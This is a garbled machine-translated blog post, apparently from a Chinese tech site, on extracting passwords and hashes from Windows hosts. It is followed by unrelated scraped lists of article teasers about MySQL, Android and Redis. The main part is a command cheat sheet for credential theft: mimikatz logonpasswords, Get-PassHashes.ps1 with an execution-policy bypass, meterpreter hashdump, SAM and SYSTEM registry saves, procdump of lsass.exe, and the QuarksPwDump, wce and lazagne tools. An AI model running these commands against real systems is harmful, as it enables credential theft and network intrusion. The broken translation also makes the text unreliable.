Online password



mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" Script

Use Get-PassHashes.ps1

powershell -exec bypass
Import-Module .\Get-PassHashes.PS1


Get meterpreter Omit the process of , use smb445 Port to establish a connection

run hashdump
post/windows/gather/credentials/domain_hashdump( Get domain hash)
use mimikatz
wdigest( Plaintext )

4.cs go online

The host needs to be at least administrator jurisdiction ,user The authority needs to be raised before it can be grasped

logonpasswords( Plaintext )

Here I use powershell go online , I won't go into details about the online process

hashdump command

wdigest command

logonpasswords command

Offline password capture

1.SAM( Shadow copy 、 The registry )

Shadow copy : Shadow copy , Also known as snapshots , Is stored in the Data Protection Manager (DPM) Point in time copy of the copy on the server . A replica is a protected share of a single volume on a file server 、 Full point in time copies of folders and files .

In the administrator state, execute the following command

reg save hklm\sam
reg save hklm\system

Until then mimikatz Execute the following command

lsadump::sam / /

(2)lsass.exe( Inject lsass.exe process , And extract... From its memory )

Execute the following command :

procdump.exe -accepteula -ma lsass.exe lsass.dmp

There is mimikatz and dmp File directory cmd, Execute the following command

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

notes : Both of these steps require administrator privileges , Otherwise, the following error will be reported

(3) Manual export lsass.dmp file

Use task manager to export lsass.dmp file

The steps are the same as above

Other tools


The order is as follows :

QuarksPwDump.exe –dhl -o hash.txt


Grab the plaintext

wce.exe -w

Grab hash

wce.exe -l


The order is as follows

lazagne.exe windows


Thank you for your ideas , That's why this article , I would like to express my heartfelt thanks to master Yicun Yiye

There's a lot more to catch here hash The advanced method of , But because of technology, even in practice, we don't know the principle , So I'm not going to do in-depth research for the moment , Post a link to interested masters , You can continue to delve into , Wait until you have enough knowledge

windows More related articles on password summary under the environment

  1. windows In the environment mysql Password reset

    1. open cmd window , Enter the command [mysqld --skip-grant-tables] enter . 2. Open one more cmd window , Enter the command [mysql] enter . 3. Enter the command [use mysql; ]  Connect permission data ...

  2. windows In the environment mysql How to modify root password

    windows In the environment mysql How to modify root password With windows For example : Unable to open service , take mysql More in the catalog data Empty folder , And then call mysqld --initialize Turn on mysql ...

  3. windows In the environment nutch2.x stay eclipse Capture data and save it in mysql The detailed steps

    nutch2.x stay eclipse Capture data and save it in mysql step Recent research nutch, It took a few days , There are also many problems , It turned out to be a success , Record here , And provide reference for other interested people , Common progress . Yes nutc ...

  4. 【 Wise remark of an experienced person 】Git Use it Windows Environment

    Preface install To configure About git A few questions about using Postscript About code hosting , Previously used vss and svn, When reading blogs or forums , It is often mentioned that github, There are many famous open source software hosted in github, I think it's good ( Don't laugh ), When ...

  5. 《 High availability MySQL》1 – Windows Compressed version of the environment MySQL install

    I've been reading O’REILIY Series of < High availability MySQL>, It's natural to have a master and a slave (Master-Slave) Configure content related to scale out .Master-Slave This thing , It's standard in many companies , Basic days in development ...

  6. The first part : Use iReport The detailed process of making report (Windows In the environment )

    Tips : In some sectors , I can't see the pictures in the article , Suggest to me blog Browse the article : The article will cover 3 All aspects : The first part : Use iReport The details of making reports ...

  7. Windows In the environment Oracle Automatic backup script of database

    Batch file (.bat) @echo off echo ================================================ echo  Windows In the environment Oracle data ...

  8. Android Development of Windows In the environment Android Studio Installation and use tutorial ( The detailed steps are as follows )

    Given Google's latest Android Studio Highly respected by developers , So also follow the experience . One . Introduce Android Studio  Android Studio It's a Android development environment , be based on Intel ...

  9. Android Development of Windows Pass in the environment Eclipse The first Android App created ( The detailed steps are as follows )

    Chapter one  windows The first Android application created in the environment For convenience , I only use the all-in-one package to demonstrate . One . Download the all in one package of Android environment . Download from the official website : Android official website ( It's usually covered by walls ) Online disk download : http://yunpa ...

  10. Windows In the environment Redis

    Redis Is a high-performance key-value database , Use memory as main storage , Data access is very fast , Of course, it also provides two mechanisms to support data persistent storage . It's a pity that ,Redis The project does not directly support Windows,Windo ...

Random recommendation

  1. oracle Common commands ( It's common and easy to use )

    One .ORACLE Start up and shut down  1. In a stand-alone environment   To turn it on or off ORACLE The system must first switch to ORACLE user , as follows  su - oracle  a. start-up ORACLE System  oracle>svrmgr ...

  2. by OpenResty increase nginx_upload_module modular

    1. download or ...

  3. Reactor Pattern , Or reactor mode

    Reactor There is really no proper translation of this word into Chinese , It's called reactor mode in many places , But it's more like calling reactor The model , In fact, I think it's better to understand the responder model . By understanding , This model is more like a bodyguard , I've been waiting for your call , or ...

  4. Android -&amp;gt; How to avoid Handler Cause memory leak

    A lot of other stuff , Access to personal blogs Error code Suppose that Activiy Through inner classes (Runnable) Defines a variable in the same way runnable, final Runnable r ...

  5. Linux Next DIR,dirent,stat And so on

    Excerpt from : Recently in to see Linux The next chapter is about file operation , I met this ...

  6. 2、Libgdx Configure your development environment (Eclipse,Intellij IDEA,NetBeans)

    Libgdx Project use Gradle Management dependence , The construction process and IDE Integrate . This allows you to use your favorite development environment to develop your application . Don't submit to IDE To your source control system . To configure Eclipse If you want to by Ecli ...

  7. Python Installation and small program writing

    Python Installation Before that , I have no idea Python, In order to complete the task , In a hurry to understand Python, Through Baidu , Install step by step Python The process 1. Find the download menu from the official website and download the latest version 2. double-click pyt ...

  8. Django command

    django # install : pip3 install django Add environment variables #1 establish project django-admin startproject mysite ---mysite ---se ...

  9. java note ---- Interview question summary ( One )【 turn 】

    1. What are the features of object-oriented ? answer : The characteristics of object-oriented are as follows : - abstract : Abstract is the process of summing up the common characteristics of a class of objects to construct a class , Including data abstraction and behavior abstraction . Abstractions only focus on the properties and behaviors of objects , Not paying attention ...

  10. go Related knowledge

    Follow up development go relevant , Environment building go env // View all of the environments go There are only three types of references slice( section ). map( Dictionaries ). channel( The Conduit ): go The type of shallow memory 4 Secondary type bool, character string , Numbers ...